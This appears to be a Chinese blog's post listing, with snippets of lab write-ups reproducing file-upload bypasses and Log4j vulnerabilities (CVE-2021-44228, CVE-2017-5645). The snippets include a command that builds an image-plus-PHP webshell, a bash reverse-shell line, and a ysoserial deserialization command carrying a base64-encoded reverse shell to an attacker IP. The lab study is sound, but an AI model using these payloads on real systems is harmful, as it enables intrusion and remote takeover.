- 博客(5)
- 收藏
- 关注
原创 关于第一关文件上传的第一关的过程
copy xjh.png/b+xjh.php tpm.jpg------------图片码制作的代码(前面是图片---后面是一句话木马)(7) 在蚁剑中右键打开终端,先查看id / pwd / uname -a。(8)最后输入寻找的flag的命令。步骤三:找到flag 提交flag值,靶场完成。
2025-10-26 10:28:26
245
原创 Burp抓包+nginx靶场漏洞复现实战
思路二:在.php后缀上传失败,将2.php 修改1.gif的文件来进行burp 抓包,改包来进行测试。通过.php文件测试,来看不可以,.php是在黑名单中。思路一:尝试简单的上传.php 的文件。使用http://开启靶场的IP :8080(来查看其中的实验的场景):确认靶场开启没有问题,经过查看实验的场景,提供了一个文件上传的页面。:查看是否开启了靶场(docker ps 查看开启的端口,)2: 需要下载nginx的靶场,1:需要应用Burp 抓包工具。(只是修改后缀名 ,不修改文件的内容。
2025-09-13 11:49:53
420
原创 log4j2-CVE-2021-44228漏洞复现
一:漏洞介绍:Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。3: 在Burp 替换完 发送。修改内容:(这里的内容可以复制我的,也可以在靶场环境中。2.9:执行后出现紫色的代码-使用1.8版本的 rmi(2.4:先准备实验准备的工具 ,下载了放到kali里。2.5:java需要11版本的 如果不是需要下载。2.3 :使用Burp抓网页的包,进行修改内容。将编码的放到bash反弹中(红线替换)
2025-08-13 10:57:27
288
原创 log4jCVE-2017-5645漏洞复现
执行代码中( java -jar ysoserial-all.jarCommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMTAuOS8xMjM0NSAwPiYx}|{base64,- d}|{bash,-i}" | nc 172.20.10.9 4712)bash -i >& /dev/tcp/kali IP / 端口 0>&1---转化为Base64编码。3:虚拟机和主机可以相互ping通。
2025-08-08 09:59:55
467
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅